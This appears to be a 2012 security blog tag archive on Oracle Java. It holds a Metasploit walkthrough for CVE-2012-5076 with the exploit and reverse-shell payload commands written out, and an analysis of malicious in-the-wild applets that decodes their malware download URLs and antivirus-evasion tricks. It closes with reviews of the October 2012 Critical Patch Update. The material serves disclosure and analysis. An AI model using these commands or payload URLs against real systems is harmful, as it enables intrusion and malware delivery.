Tag Archives: Oracle

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Funny and Efficient Anti-Virus Bypass Packed Java Applets Exploits CVE-2012-4681 in the Wild

The 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.grvb.com.tw) who is actually still online. The home page of the server is loading a first Java Applet with a JAR file “Java.jar” and a second Java Applet as a single class file “eiAD.class“.

VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 Java/Downloader detection, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 CVE-2012-4681 Oracle Java Gondvv exploit detection. The detection rate is really low and a deeper analysis of these elements is interesting.

Thanks to @_sinn3r, @binjo, @jjarmoc and @maxime_tz for all they’re advises.

Java.jar” (paste bin source code) JAR Java/Downloader analysis

This JAR file contain a Manifest file how reveal that the file was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)” and the JAR file is signed with a RSA signature.

You can see this self-signed certificate was create the 16 October and was pretending to be generated by Microsoft and issued by Microsoft. By signing an applet, the restrictions on an applet are mostly removed. Signing an applet, basically means that the applet writer is vouching that the applet is safe. The user of a signed applet can accept the signed applet and have it run without most restrictions, or reject the applet and not have it run at all. A self-signed applet will trigger a security warning pop-up advising you on the associated risks. Similar self-signed Java Applet could be generated with java_signed_applet Metasploit exploit module.

By analyzing the source code of “Java.jar” we can see interesting arrays and functions.

The “FCKME” is an array where a space is representing a new entry in the array. The guys don’t seem to like ESET anti-virus editor of NOD-32 🙂

Encoded string is present and will be decoded by the beside “FJKOKL” function. You can see that the 29 value of the “FCKME” array will be used to complete the encoded text.

This function will remove all the “[>|<]” values of the encoded text with the following result.

687474703a2f2f7777772e677672622e636f6d2e74772f75706c6f61642f757365722f66696c65732f6e756d“.

The string is encoded in HEX and after decoding you will have the following result completed with “FCKME[29]” how is “.exe“.

http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)

The following table will provide all value of “FCKME” array.

With all these value we are able to decode all “FCKME” variable used in the “Java.jar” code.

As you can see the Java.jar is only a self-signed Java downloader. Finally, as pointed by @_sinn3r, this Applet is surely used as a plan B, if eiAD.class is not triggered.

eiAD.class” (paste bin source code) CVE-2012-4681 Java class file analysis

By analyzing the source code of “eiAD.class” we can see interesting arrays and functions.

This variable seem to be one more time an reference to ESET anti-virus editor and especially to the “Foxxy Software Outfoxed” blogpost. (Thanks to @binjo).

Encoded string is present and will be decoded by the beside “FJKOKL” function, also used in “Java.jar“. A space is representing a new entry in the “JFI” array.

FJKOKL” will remove all the “[>|<]” values of the encoded text with the following result.

4e6f7468696e67206c696b652073756e2e206265696e672061206177742e20536f6d6574696d6573204920707574206d792053756e546f6f6c6b697420696e206d7920617373686f6c652120596f752073656520746865206765742069732061204669656c642074686174204e616d6520666f72202e657865206f6b6179202f2f2049206d65616e20676f642064616d6e2074686520676574206973206265696e672073657420666f7220746865205365637572697479204d616e6167657220666f722066696c653a2f202120476f742064616d6e20492077616e7420736f6d65206d696c6b2066726f6d206d79206d6f6d6d696573207469747a20666f72207468617420616363

“.

The string is encoded in HEX and after decoding you will have the following result.

Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc“.

The following table will provide all value of “JFI” array.

With all these value we are able to decode all “JFI” variable used in the “Java.jar” code.

With all these variables and other functions the code will be able to reconstruct CVE-2012-4681 Oracle Java vulnerability.

Another encoded string is present in “eiAD.class” and this encoded string has the same result as the “Java.jar“.

http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)

I found a Author variable occurrence “lEZdLl.classon pastebin who was posted by a Guest the 24 September, and is equivalent to “eiAD.class“.

HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file is actually no more existing).

Here under a demonstration video of the effectiveness of these files against anti-viruses.

Oracle Java Critical Patch Update October 2012 Review

Oracle has provide his Java Critical Patch Update (CPU) for October 2012 how has been released on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concern “Java Runtime Environment” and “JavaFX” components. On the 30 security vulnerabilities all of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 15 vulnerabilities have a CVSS base score upper or equal to 7.0.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 7 and earlier
  • JDK and JRE 6 Update 35 and earlier
  • JDK and JRE 5.0 Update 36 and earlier
  • SDK and JRE 1.4.2_38 and earlier
  • JavaFX 2.2 and earlier

CVE-2012-5083CVE-2012-1531CVE-2012-5086CVE-2012-5087CVE-2012-1533CVE-2012-1532CVE-2012-5076CVE-2012-3143CVE-2012-5088 and CVE-2012-5078 have a CVSS base score of 10.0CVE-2012-5089CVE-2012-5084 and CVE-2012-5080 have a CVSS base score of 7.6CVE-2012-3159 and CVE-2012-5068 have a CVSS base score of 7.5CVE-2012-4416CVE-2012-5074 and CVE-2012-5071 have a CVSS base score of 6.4CVE-2012-5069 has a CVSS base score of 5.8CVE-2012-5067CVE-2012-5070CVE-2012-5075CVE-2012-5073CVE-2012-5079CVE-2012-5072CVE-2012-5081 and CVE-2012-5082 have a CVSS base score of 5.0CVE-2012-3216 and CVE-2012-5077 have a CVSS base score of 2.6CVE-2012-5085 has a CVSS base score of 0.0.

Oracle Critical Patch Update October 2012 Review

Oracle has provide his Critical Patch Update (CPU) for October 2012 how has been released on Tuesday, October 16. This CPU contains 109 security vulnerability fixes across 11 of Oracle products. On the 109 security vulnerabilities 32 of them may be remotely exploitable without authentication, this represent 29% of the vulnerabilities. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0 and concern Oracle Database Server and Oracle Fusion Middleware. 6 vulnerabilities have a CVSS base score upper or equal to 7.0.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Oracle Database Server

5 vulnerabilities are reported for “Oracle Database Server” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 10.0. Affected component is “Core RDBMS“.

CVE-2012-3132, with a CVSS base score of 6.5 is related to the security alert emitted during August 2012CVE-2012-3137 has a Oracle CVSS base score of 10.0 but an NIST CVSS base score of 6.4CVE-2012-1751 has a CVSS base score of 6.5CVE-2012-3151 a CVSS base score of 3.3 and CVE-2012-3146 a CVSS base score of 2.1.

Oracle Fusion Middleware

26 vulnerabilities are reported for “Oracle Fusion Middleware” and 13 of them may be remotely exploitable without authentication. The highest CVSS score of this vulnerability is 10.0. Affected component is “Oracle JRockit“, “Oracle Reports Developer“, “Oracle Event Processing“, “Oracle WebLogic Server“, “Oracle Imaging and Process Management“, “Oracle WebCenter Sites“, “Oracle Application Server Single Sign-On“, “Oracle BI Publisher“, “Oracle Business Intelligence Enterprise Edition” and “Oracle Outside In Technology“.

CVE-2012-3202 has a CVSS base score of 10.0CVE-2012-3152 and CVE-2012-3153 have a CVSS base score of 6.4. CVE-2011-1411 has a CVSS base score of 5.8. CVE-2012-0106, CVE-2012-3183CVE-2012-3185 and CVE-2012-3186 have a CVSS base score of 4.9. CVE-2012-3175, CVE-2012-0518CVE-2012-3194CVE-2012-1686CVE-2012-0071CVE-2012-0093 and CVE-2012-3184 have a CVSS base score of 4.3. CVE-2012-3193, CVE-2012-0086CVE-2012-0090CVE-2012-0092 and CVE-2012-0108 have a CVSS base score of 3.5CVE-2012-0095CVE-2012-3214CVE-2012-3217 and CVE-2012-5065 have a CVSS base score of 2.1.

Oracle E-Business Suite

9 vulnerabilities are reported for “Oracle E-Business Suite” and 6 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.4. Affected components are “Oracle Human Resources“, “Oracle Applications Technology Stack“, “Oracle iRecruitment“, “Oracle Application Object Library“, “Oracle iStore“, “Oracle Field Service“, “Oracle Marketing” and “Oracle Applications Framework“.

CVE-2012-3196 has a CVSS base score of 6.4CVE-2012-3171 and CVE-2012-3222 have a CVSS base score of 5.0CVE-2012-3139CVE-2012-3138 and CVE-2012-5058 have a CVSS base score of 4.3CVE-2012-3148 and CVE-2012-3164 have a CVSS base score of 3.5CVE-2012-3162 has a CVSS base score of 1.7.

Oracle Supply Chain Products Suite

9 vulnerabilities are reported for “Oracle Supply Chain Products Suite” and 4 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “Oracle Agile PLM For Process“, “Oracle Agile PLM Framework” and “Oracle Agile Product Supplier Collaboration for Process“.

CVE-2012-3140 and CVE-2012-5092 have a CVSS base score of 5.5CVE-2012-5094 has a CVSS base score of 5.0CVE-2012-3161CVE-2012-5093 and CVE-2012-5091 have a CVSS base score of 4.3CVE-2012-3154CVE-2012-3200 and CVE-2012-5090 have a CVSS base score of 4.0.

Oracle PeopleSoft Products

9 vulnerabilities are reported for “Oracle PeopleSoft Products” and 1 of them may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. Affected component are “PeopleSoft Enterprise PeopleTools” and “PeopleSoft Enterprise Campus Solutions“.

CVE-2012-3182 has a CVSS base score of 4.3CVE-2012-3201CVE-2012-3195CVE-2012-3198 and CVE-2012-3181 have a CVSS base score of 4.0CVE-2012-3188CVE-2012-3176 and CVE-2012-3179 have a CVSS base score of 3.5CVE-2012-3191 has a CVSS base score of 2.1.

Oracle Siebel CRM

2 vulnerabilities are reported for “Oracle Siebel CRM” and 1 of them may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. Affected component is “Siebel UI Framework“.

CVE-2012-3230 has a CVSS base score of 4.3CVE-2012-3229 has a CVSS base score of 4.0.

Oracle Industry Applications

2 vulnerabilities are reported for “Oracle Industry Applications” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected components are “Oracle Central Designer” and “Oracle Clinical/Remote Data Capture“.

CVE-2012-5066 has a CVSS base score of 6.8CVE-2012-1763 has a CVSS base score of 4.0.

Oracle Financial Services Software

13 vulnerabilities are reported for “Oracle Financial Services Software” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “Oracle FLEXCUBE Universal Banking” and “Oracle FLEXCUBE Direct Banking“.

CVE-2012-3226 has a CVSS base score of 5.5CVE-2012-5063 has a CVSS base score of 5.0CVE-2012-3228 has a CVSS base score of 4.9CVE-2012-3141 and CVE-2012-5061 have a CVSS base score of 4.0CVE-2012-3225 has a CVSS base score of 3.6CVE-2012-3142CVE-2012-3157CVE-2012-3224CVE-2012-3227 and CVE-2012-5064 have a CVSS base score of 3.5CVE-2012-3223 has a CVSS base score of 2.1CVE-2012-3145 has a CVSS base score of 1.5.

Oracle Sun Products Suite

18 vulnerabilities are reported for “Oracle Sun Products Suite” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “Solaris“, “Oracle GlassFish Server“, “Sun GlassFish Enterprise Server“, “Sun Java System Application Server“, “SPARC T3“, “Netra SPARC T3“, “SPARC T4” and “Netra SPARC T4“.

CVE-2012-3210 and CVE-2012-3189 have a CVSS base score of 7.8CVE-2012-3199CVE-2012-0217 and CVE-2012-3204 have a CVSS base score of 7.2CVE-2012-3187 has a CVSS base score of 6.9CVE-2012-3209 has a CVSS base score of 5.6CVE-2012-3155 has a CVSS base score of 5.0CVE-2012-3207 and CVE-2012-3208 have a CVSS base score of 4.9CVE-2012-3212 has a CVSS base score of 4.7CVE-2012-3211 has a CVSS base score of 4.6CVE-2012-5095 has a CVSS base score of 4.4CVE-2012-3165 has a CVSS base score of 3.6CVE-2012-3206CVE-2012-3203 and CVE-2012-3205 have a CVSS base score of 2.1CVE-2012-3215 has a CVSS base score of 1.7.

Oracle Virtualization

2 vulnerabilities are reported for “Oracle Virtualization” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Secure Global Desktop” and “Oracle VM Virtual Box“.

CVE-2012-1685 has a CVSS base score of 4.3CVE-2012-3221 has a CVSS base score of 2.1.

Oracle MySQL

14 vulnerabilities are reported for “Oracle MySQL” and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 9.0. Affected components are “MySQL Server“.

CVE-2012-3163 has a CVSS base score of 9.0CVE-2012-3158 has a CVSS base score of 7.5CVE-2012-3177 has a CVSS base score of 6.8CVE-2012-3147 has a CVSS base score of 6.4CVE-2012-3166CVE-2012-3173CVE-2012-3144CVE-2012-3150 and CVE-2012-3180 have a CVSS base score of 4.0CVE-2012-3149CVE-2012-3156CVE-2012-3167 and CVE-2012-3197 have a CVSS base score of 3.5CVE-2012-3160 has a CVSS base score of 2.1.